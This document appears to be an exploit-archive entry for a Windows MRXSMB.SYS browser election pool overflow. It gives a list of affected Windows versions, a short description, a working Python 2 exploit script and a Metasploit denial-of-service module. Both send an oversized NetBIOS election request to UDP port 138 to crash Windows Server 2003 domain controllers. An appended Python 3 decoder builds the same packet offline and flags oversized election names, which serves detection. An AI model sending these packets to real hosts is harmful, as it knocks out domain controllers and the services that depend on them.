Microsoft Windows MRXSMB.SYS Browser Election Request Pool Overflow Vulnerability

Affected versions:
Microsoft Windows XP Tablet PC Edition SP3
Microsoft Windows XP Service Pack 3 0
Microsoft Windows XP Professional x64 Edition SP3
Microsoft Windows XP Professional SP3
Microsoft Windows XP Media Center Edition SP3
Microsoft Windows XP Home SP3
Microsoft Windows XP Embedded SP3
Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition Sp2 X64
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition Sp1 X64
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista December CTP X64
Microsoft Windows Vista December CTP SP2
Microsoft Windows Vista December CTP SP1
Microsoft Windows Vista December CTP Gold
Microsoft Windows Vista December CTP
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista SP2 Beta
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows Vista beta 2
Microsoft Windows Vista Beta 1
Microsoft Windows Vista Beta
Microsoft Windows Vista 3.0
Microsoft Windows Vista 2.0
Microsoft Windows Vista 1.0
Microsoft Windows Vista 0
Microsoft Windows Server 2008 Standard Edition X64
Microsoft Windows Server 2008 Standard Edition SP2
Microsoft Windows Server 2008 Standard Edition Release Candidate
Microsoft Windows Server 2008 Standard Edition Itanium
Microsoft Windows Server 2008 Standard Edition 0
Microsoft Windows Server 2008 R2 x64 0
Microsoft Windows Server 2008 R2 Itanium 0
Microsoft Windows Server 2008 R2 Datacenter 0
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems R2
Microsoft Windows Server 2008 for x64-based Systems 0
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems R2
Microsoft Windows Server 2008 for Itanium-based Systems 0
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems 0
Microsoft Windows Server 2008 Enterprise Edition SP2
Microsoft Windows Server 2008 Enterprise Edition Release Candidate
Microsoft Windows Server 2008 Enterprise Edition 0
Microsoft Windows Server 2008 Datacenter Edition SP2
Microsoft Windows Server 2008 Datacenter Edition Release Candidate
Microsoft Windows Server 2008 Datacenter Edition 0
Microsoft Windows Server 2008 SP2 Beta
Microsoft Windows Server 2008 - Sp2 Enterprise X64
Microsoft Windows Server 2003 x64 SP2
Microsoft Windows Server 2003 x64 SP1
Microsoft Windows Server 2003 Web Edition SP2
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Terminal Services 0
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP2
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 R2 web Edition 0
Microsoft Windows Server 2003 R2 Standard Edition 0
Microsoft Windows Server 2003 R2 Enterprise Edition SP2 0
Microsoft Windows Server 2003 R2 Enterprise Edition SP1 0
Microsoft Windows Server 2003 R2 Enterprise Edition 0
Microsoft Windows Server 2003 R2 Datacenter Edition SP2 0
Microsoft Windows Server 2003 R2 Datacenter Edition SP1 0
Microsoft Windows Server 2003 R2 Datacenter Edition 0
Microsoft Windows Server 2003 Itanium SP2
Microsoft Windows Server 2003 Itanium SP1
Microsoft Windows Server 2003 Itanium 0
Microsoft Windows Server 2003 Enterprise x64 Edition SP2
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium Sp2 Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium SP2
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition SP2
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2008 R2
Microsoft Windows 7 XP Mode 0
Microsoft Windows 7 Ultimate 0
Microsoft Windows 7 Starter 0
Microsoft Windows 7 Professional 0
Microsoft Windows 7 Home Premium 0
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 RC
Microsoft Windows 7 beta
Microsoft Windows 7
Vulnerability description:
A specially crafted browser election request, delivered in a NetBIOS datagram (UDP/138) to the \MAILSLOT\BROWSE mailslot of a host running the browser service (the included module targets Windows Server 2003 configured as a domain controller), causes a pool overflow in the kernel SMB driver mrxsmb.sys. Because the bad copy runs in kernel mode, a working exploit would execute with kernel (system-level) privileges, but the module below notes that turning the overflow into code execution does not appear trivial; the reliable outcome is a remote kernel denial of service (blue screen). The trigger is an election request whose server-name field is far longer than a legitimate 15-byte NetBIOS name (roughly 60 to 410 bytes in the scripts below).
<*Reference

*>

Test method (the Python script must run as root because it binds UDP/138; the Metasploit auxiliary module follows it):
#!/usr/bin/env python2
# Python 2 script: str is a byte string here. Needs root to bind UDP/138.
import sys, struct
from socket import *

if len(sys.argv) <= 4:
    sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah AD-NETBIOS-NAME""")

ourip   = sys.argv[1]          # source IP written into the datagram header
host    = sys.argv[2]          # broadcast (or target) address, UDP/138
srcname = sys.argv[3].upper()  # our NetBIOS name
dstname = sys.argv[4].upper()  # target domain / workgroup name

# Pre-encoded (half-ASCII) 16th NetBIOS name byte plus terminator
ELEC   = "\x42\x4f\x00"  # "BO" -> 0x1e, browser service elections
WREDIR = "\x41\x41\x00"  # "AA" -> 0x00, workstation / redirector

def encodename(nbt, service):
    # First-level NetBIOS encoding: each byte becomes two chars 'A'+nibble;
    # pad to 15 bytes with encoded spaces ("CA") and append the service byte.
    final = '\x20' + ''.join([chr((ord(i) >> 4) + ord('A')) + chr((ord(i) & 0xF) + ord('A')) for i in nbt])
    final += ((15 - len(nbt)) * '\x43\x41') + service
    return final

def lengthlittle(packet, addnum):
    # 16-bit little-endian length (SMB fields)
    return struct.pack("<i", len(packet) + addnum)[0:2]

def lengthbig(packet, addnum):
    # 16-bit big-endian length (NetBIOS datagram header)
    return struct.pack(">i", len(packet) + addnum)[2:4]

def election(srcname):
    elec  = "\x08"              # browser opcode: election request
    elec += "\x09"              # election version
    elec += "\xa8\x0f\x01\x20"  # criteria: desire, major, minor, OS
    elec += "\x1b\xe9\xa5\x00"  # up time
    elec += "\x00\x00\x00\x00"  # unused
    elec += srcname + "\x00"    # server name: the field that is oversized
    return elec

def smbheaderudp(op="\x25"):
    # 32-byte SMB header; 0x25 = SMB_COM_TRANSACTION, every other field zero
    smbheader  = "\xff\x53\x4d\x42"
    smbheader += op
    smbheader += "\x00" * 27
    return smbheader

def trans2mailslot(tid="\x80\x0b", ip=ourip, sname="LOVE-SDL", dname="SRD-LOVE",
                   namepipe="\\MAILSLOT\\BROWSE", srcservice="\x41\x41\x00",
                   dstservice="\x41\x41\x00", pbrowser=""):
    packetbrowser = pbrowser
    # Transaction setup words (mailslot write, priority 0, class 2), byte count, mailslot name
    packetmailslot  = "\x01\x00"
    packetmailslot += "\x00\x00"
    packetmailslot += "\x02\x00"
    packetmailslot += lengthlittle(packetbrowser + namepipe, 4)
    packetmailslot += namepipe + "\x00"
    # NetBIOS datagram header: DIRECT_GROUP, first/only fragment, id, source ip/port, length, offset
    packetdatagram  = "\x11"
    packetdatagram += "\x02"
    packetdatagram += tid
    packetdatagram += inet_aton(ip)
    packetdatagram += "\x00\x8a"   # source port 138
    packetdatagram += "\x00\xa7"   # DGM_LENGTH, patched below
    packetdatagram += "\x00\x00"   # PACKET_OFFSET
    packetdatagramname  = encodename(sname, srcservice)
    packetdatagramname += encodename(dname, dstservice)
    smbheader = smbheaderudp("\x25")
    # SMB_COM_TRANSACTION parameter words
    packetrans2  = "\x11"                          # word count (14 + 3 setup words)
    packetrans2 += "\x00\x00"                      # total parameter count
    packetrans2 += lengthlittle(packetbrowser, 0)  # total data count
    packetrans2 += "\x00\x00"                      # max parameter count
    packetrans2 += "\x00\x00"                      # max data count
    packetrans2 += "\x00"                          # max setup count
    packetrans2 += "\x00"                          # reserved
    packetrans2 += "\x00\x00"                      # flags
    packetrans2 += "\xe8\x03\x00\x00"              # timeout 1000 ms
    packetrans2 += "\x00\x00"                      # reserved
    packetrans2 += "\x00\x00"                      # parameter count
    packetrans2 += "\x00\x00"                      # parameter offset
    packetrans2 += lengthlittle(packetbrowser, 0)  # data count
    packetrans2 += lengthlittle(smbheader + packetrans2 + packetmailslot, 4)  # data offset
    packetrans2 += "\x03"                          # setup count
    packetrans2 += "\x00"                          # reserved
    lengthcalc  = packetdatagramname + smbheader + packetrans2 + packetmailslot + packetbrowser
    packetfinal = packetdatagram + packetdatagramname + smbheader + packetrans2 + packetmailslot + packetbrowser
    # Patch DGM_LENGTH (bytes 10..11) with the size of everything after the 14-byte datagram header
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc, 0)
    return ''.join(packetotalength)

def sockbroad(host, sourceservice, destservice, packet):
    s = socket(AF_INET, SOCK_DGRAM)
    s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
    s.bind(('0.0.0.0', 138))  # needs root; fails if a local browser/NetBIOS service already owns 138
    try:
        buffer0 = trans2mailslot(tid="\x80\x22", ip=ourip, sname=srcname, dname=dstname,
                                 namepipe="\\MAILSLOT\\BROWSER", srcservice=sourceservice,
                                 dstservice=destservice, pbrowser=packet)
        s.sendto(buffer0, (host, 138))
    except:
        print "expected SDL error:", sys.exc_info()[0]
        raise

# A server name of roughly 60 to 410 bytes triggers the crash
sockbroad(host, WREDIR, ELEC, election("A" * 410))  # -> Zing it! (between ~60->410)
print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time ago...."
=====================================================================
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

   include Msf::Exploit::Remote::Udp
   #include Msf::Exploit::Remote::SMB
   include Auxiliary::Dos

   def initialize(info = {})
      super(update_info(info,
         'Name'           => 'Microsoft Windows MRXSMB.SYS _BowserWriteErrorLogEntry Pool Overflow DoS',
         'Description'    => %q{
               This module exploits a denial of service flaw in the Microsoft
            Windows SMB service on versions of Windows Server 2003 that have been
            configured as a domain controller. By sending a specially crafted election
            request, an attacker can cause a pool overflow.

            The vulnerability appears to be due to an error handling a length value
            while calculating the amount of memory to copy to a buffer. When there are
            zero bytes left in the buffer, the length value is improperly decremented
            and an integer underflow occurs. The resulting value is used in several
            calculations and is then passed as the length value to an inline memcpy
            operation.

            Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and
            causes considerable damage to kernel heap memory. While theoretically possible,
            it does not appear to be trivial to turn this vulnerability into remote (or
            even local) code execution.
         },
         'References'     =>
            [
               #[ 'CVE', '2011-XXXX' ],
               #[ 'OSVDB', 'XXXX' ],
               #[ 'MSB', 'MS11-XXX' ],
               [ 'URL', 'http://www.leehoosoftware.org' ]
            ],
         'Author'         => [ 'Cupidon-3005', 'jduck' ],
         'License'        => MSF_LICENSE,
         'Version'        => '$Revision: 11756 $'
      ))

      register_options(
         [
            Opt::RPORT(138),
            OptString.new('DOMAIN', [ true, "The name of the domain that the target controls" ])
         ], self.class)
   end


   def run

      connect_udp
      @client = Rex::Proto::SMB::Client.new(udp_sock)

      ip = Rex::Socket.source_address(datastore['RHOST'])
      ip_src = Rex::Socket.gethostbyname(ip)[3]

      svc_src = "\x41\x41\x00"   # pre-encoded?
      name_src = Rex::Text.rand_text_alphanumeric(4+rand(10))

      svc_dst = "\x42\x4f\x00"   # pre-encoded?
      name_dst = datastore['DOMAIN']

      pipe = "\\MAILSLOT\\BROWSER"

      election =
         "\x08" +               # Election Request
         "\x09" +               # Election Version
         "\xa8" +               # election desire - Domain Master & WINS & NT
         "\x0f" +               # Browser Protocol Major Version
         "\x01" +               # Browser Protocol Minor Version
         "\x20" +               # Election OS (NT Server)
         "\x1b\xe9\xa5\x00" +   # Uptime
         "\x00\x00\x00\x00" +   # NULL... Padding?
         ("A" * 410) + "\x00"   # name

      nbdghdr =
         "\x11" +                     # DIRECT_GROUP datagram
         "\x02" +                     # first and only fragment
         [rand(0xffff)].pack('n') +   # Transaction Id (DGM_ID)
         ip_src +
         "\x00\x8a" +                 # Source Port (138)
         "\x00\xa7" +                 # DGM_LENGTH, patched in after
         "\x00\x00"                   # PACKET_OFFSET

      nbdgs = nbdghdr +
         half_ascii(name_src, svc_src) +
         half_ascii(name_dst, svc_dst)

      # A Trans request for the mailslot
      nbdgs << trans_mailslot(pipe, '', election)

      # Patch up the length (less the nb header)
      nbdgs[0x0a, 2] = [nbdgs.length - nbdghdr.length].pack('n')

      print_status("Sending specially crafted browser election request..")
      #print_status("\n" + Rex::Text.to_hex_dump(nbdgs))
      udp_sock.put(nbdgs)

      print_status("The target should encounter a blue screen error now.")

      disconnect_udp

   end


   # Perform a browser election request using the specified subcommand, parameters, and data
   def trans_mailslot(pipe, param = '', body = '')

      # Null-terminate the pipe parameter if needed
      if (pipe[-1,1] != "\x00")
         pipe << "\x00"
      end

      pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct
      @client.smb_defaults(pkt['Payload']['SMB'])

      setup_count = 3
      setup_data = [1, 0, 2].pack('v*')

      data = pipe + param + body

      base_offset = pkt.to_s.length + (setup_count * 2) - 4
      param_offset = base_offset + pipe.length
      data_offset = param_offset + param.length

      pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION
      pkt['Payload']['SMB'].v['Flags1'] = 0x0
      pkt['Payload']['SMB'].v['Flags2'] = 0x0
      pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count

      pkt['Payload'].v['ParamCountTotal'] = param.length
      pkt['Payload'].v['DataCountTotal'] = data.length
      pkt['Payload'].v['ParamCountMax'] = 0
      pkt['Payload'].v['DataCountMax'] = 0

      pkt['Payload'].v['ParamCount'] = param.length
      pkt['Payload'].v['ParamOffset'] = param_offset if param.length > 0
      pkt['Payload'].v['DataCount'] = body.length
      pkt['Payload'].v['DataOffset'] = data_offset
      pkt['Payload'].v['SetupCount'] = setup_count
      pkt['Payload'].v['SetupData'] = setup_data

      pkt['Payload'].v['Payload'] = data

      exploit = pkt.to_s

      # Strip off the netbios header (thx, but no thx!)
      exploit[4, exploit.length - 4]
   end


   def half_ascii(name, svc)
      ret = " "
      name.unpack('C*').each { |byte|
         ret << [0x41 + (byte >> 4)].pack('C')
         ret << [0x41 + (byte & 0xf)].pack('C')
      }
      left = 15 - name.length
      if left > 0
         ret << "\x43\x41" * left
      end

      # In our case, svc is already encoded..
      ret << svc
      ret
   end

end
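Both scripts above hard-code every offset and patch the datagram length in by hand, which is enough to fire the trigger but not to inspect what is on the wire. The following Python 3 program is an added example (it is not the page's exploit, nor the Metasploit module): it builds the same NetBIOS datagram / SMB_COM_TRANSACTION / \MAILSLOT\BROWSE election request with offsets derived from the layout, then decodes it with a parser that refuses any datagram whose declared lengths do not fit the bytes actually present and reports the election server-name length, the field the page's scripts inflate to 410 bytes. The opcode, criteria bytes and half-ASCII service suffixes are the page's own values; the function names, the sample names OHYEAH and CORP, and the 192.168.1.10 source address are constructed for this example.

```python
import socket
import struct

# Added example, not the page's exploit: constants below are the page's values.
BROWSER_ELECTION = 0x08
SVC_WORKSTATION = b"\x41\x41\x00"  # half-ASCII "AA" -> service byte 0x00
SVC_ELECTION = b"\x42\x4f\x00"     # half-ASCII "BO" -> service byte 0x1e (elections)
MAILSLOT = b"\\MAILSLOT\\BROWSE"
NETBIOS_NAME_MAX = 15              # longest legitimate server name


def half_ascii(name, svc):
    """First-level NetBIOS encoding: 0x20 length byte, 15 space-padded bytes as
    two 'A'+nibble chars each, then the pre-encoded service byte + terminator."""
    out = bytearray(b"\x20")
    for b in name[:NETBIOS_NAME_MAX].ljust(NETBIOS_NAME_MAX, b" "):
        out += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return bytes(out + svc)


def decode_half_ascii(buf, off):
    """Inverse of half_ascii; returns (name, service_byte, next_offset)."""
    raw = buf[off + 1:off + 33]
    if len(buf) < off + 34 or buf[off] != 0x20 or buf[off + 33] != 0 \
            or any(not 0x41 <= c <= 0x50 for c in raw):
        raise ValueError("malformed NetBIOS name")
    dec = bytes(((raw[i] - 0x41) << 4) | (raw[i + 1] - 0x41) for i in range(0, 32, 2))
    return dec[:15].rstrip(b" "), dec[15], off + 34


def election_request(server_name):
    """ElectionRequest: opcode, version, 4 criteria bytes, uptime, 4 unused
    bytes, then the NUL-terminated server name (the field the page inflates)."""
    return (bytes([BROWSER_ELECTION, 0x09]) + b"\xa8\x0f\x01\x20" + b"\x1b\xe9\xa5\x00"
            + b"\x00" * 4 + server_name + b"\x00")


def smb_trans_mailslot(mailslot, body):
    """SMB_COM_TRANSACTION (0x25) carrying a class-2 mailslot write; the data
    offset is derived from the layout instead of being hand-patched."""
    name, setup_count = mailslot + b"\x00", 3
    data_offset = 32 + 1 + 28 + 2 * setup_count + 2 + len(name)   # hdr+wc+words+setup+bcc+name
    words = struct.pack("<HHHHBBHIHHHHHBB",
                        0, len(body), 0, 0, 0, 0,   # Total/Max Param+Data, MaxSetup, reserved
                        0, 1000, 0, 0, 0,           # Flags, Timeout ms, reserved, ParamCount/Offset
                        len(body), data_offset, setup_count, 0)
    setup = struct.pack("<HHH", 1, 0, 2)            # MailslotWrite, priority 0, class 2
    return (b"\xffSMB" + bytes([0x25]) + b"\x00" * 27 + bytes([14 + setup_count])
            + words + setup + struct.pack("<H", len(name) + len(body)) + name + body)


def nbt_election_datagram(src_ip, src_name, dst_name, server_name, dgm_id=0x1234):
    """DIRECT_GROUP datagram (type 0x11, first and only fragment) for UDP/138."""
    payload = (half_ascii(src_name, SVC_WORKSTATION) + half_ascii(dst_name, SVC_ELECTION)
               + smb_trans_mailslot(MAILSLOT, election_request(server_name)))
    hdr = struct.pack("!BBH4sHHH", 0x11, 0x02, dgm_id, socket.inet_aton(src_ip),
                      138, len(payload), 0)         # source port, DGM_LENGTH, PACKET_OFFSET
    return hdr + payload


def parse_election(dgram):
    """Decode a port-138 datagram, failing closed when a declared length does
    not fit the bytes present, and report the election server-name length."""
    if len(dgram) < 14:
        raise ValueError("short datagram header")
    msg_type, _, _, src_ip, _, dgm_len, _ = struct.unpack("!BBH4sHHH", dgram[:14])
    if msg_type not in (0x10, 0x11, 0x12) or dgm_len != len(dgram) - 14:
        raise ValueError("not a NetBIOS datagram or DGM_LENGTH mismatch")
    src_name, _, off = decode_half_ascii(dgram, 14)
    dst_name, _, off = decode_half_ascii(dgram, off)
    smb = dgram[off:]
    if len(smb) < 33 + 28 or smb[:4] != b"\xffSMB" or smb[4] != 0x25:
        raise ValueError("not an SMB_COM_TRANSACTION")
    f = struct.unpack_from("<HHHHBBHIHHHHHBB", smb, 33)
    data_count, data_off, setup_count = f[11], f[12], f[13]
    name_start = 33 + 28 + 2 * setup_count + 2
    nul = smb.find(b"\x00", name_start)
    if smb[32] != 14 + setup_count or nul < 0 or data_off + data_count > len(smb):
        raise ValueError("transaction fields run past the datagram")
    info = {"src_ip": socket.inet_ntoa(src_ip), "src_name": src_name, "dst_name": dst_name,
            "mailslot": smb[name_start:nul], "election": False,
            "server_name_len": 0, "oversized": False}
    body = smb[data_off:data_off + data_count]
    if not info["mailslot"].upper().startswith(MAILSLOT) or not body or body[0] != BROWSER_ELECTION:
        return info                                 # some other mailslot / browser frame
    if len(body) < 14:
        raise ValueError("truncated election request")
    end = body.find(b"\x00", 14)
    name_len = (len(body) if end < 0 else end) - 14  # an unterminated name counts to the end
    # Legitimate names are <= 15 bytes; the page's trigger range is ~60..410 bytes.
    info.update(election=True, server_name_len=name_len, oversized=name_len > NETBIOS_NAME_MAX)
    return info


if __name__ == "__main__":
    for name in (b"WS01", b"A" * 410):              # benign name vs. the page's trigger
        print(parse_election(nbt_election_datagram("192.168.1.10", b"OHYEAH", b"CORP", name)))
```

Run stand-alone it only builds the two datagrams in memory and prints the decoded fields; nothing is sent. To use the decoder for detection, feed parse_election the UDP payload of captured port-138 datagrams and alert on election requests whose oversized flag is set, or on the ValueError cases, since a benign browser client never emits a server name longer than 15 bytes or a transaction whose offsets run past the datagram.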
